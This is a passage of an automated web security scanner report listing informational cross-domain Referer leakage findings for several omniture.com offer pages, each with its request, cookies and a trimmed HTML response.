Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:11:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:11:27 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:11:27 GMT
Content-Length: 13697
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:11:27 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Multichannel Measurement:Strate
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.321. http://www.omniture.com/offer/286 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/286

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/286?s_osc=24653

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/286?s_osc=24653 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:07:50 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:07:50 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:07:51 GMT
Content-Length: 13629
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:07:50 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Adobe.. Test&Target, powered by
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.322. http://www.omniture.com/offer/303 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/303

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/303?s_osc=24661

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/303?s_osc=24661 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:23:25 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:23:25 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:23:25 GMT
Content-Length: 14171
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:23:25 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Multichannel Retailing: Retaini
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.323. http://www.omniture.com/offer/323 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/323

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/323?s_osc=24655

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/323?s_osc=24655 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:07:26 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:07:26 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:07:26 GMT
Content-Length: 13878
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:07:26 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Survey: Product Overvi
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.324. http://www.omniture.com/offer/335 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/335

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/335?s_osc=24661

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/335?s_osc=24661 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:17:28 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:17:28 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:17:28 GMT
Content-Length: 13682
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:17:28 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Insight: Convert Shopp
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.325. http://www.omniture.com/offer/337 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/337

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/337?s_osc=24660

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/337?s_osc=24660 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:16:32 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:16:32 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:16:32 GMT
Content-Length: 13420
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:16:32 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Insight: Gain Rapid Bu
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.326. http://www.omniture.com/offer/372 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/372

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/372?s_osc=24662

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/372?s_osc=24662 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:11:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:11:18 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:11:18 GMT
Content-Length: 14022
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:11:18 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Sprint Measures Impact of Socia
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.327. http://www.omniture.com/offer/411 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/411

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/411?s_osc=24657

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/411?s_osc=24657 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:01:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:01:06 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:01:07 GMT
Content-Length: 14658
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:01:06 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Merchandising Product
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.328. http://www.omniture.com/offer/412 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/412

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/412?s_osc=24657

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/412?s_osc=24657 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:03:33 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:03:33 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:03:33 GMT
Content-Length: 14313
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:03:33 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Guess Shopper Engagement and Si
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.329. http://www.omniture.com/offer/413 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/413

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/413?s_osc=24657

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/413?s_osc=24657 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:04:03 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:04:03 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:04:04 GMT
Content-Length: 14330
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:04:03 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>10 Best Practices for Online Me
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.330. http://www.omniture.com/offer/427 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/427

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/427?s_osc=14885

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?
http://www.97thfloor.com/

Request

GET /offer/427?s_osc=14885 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
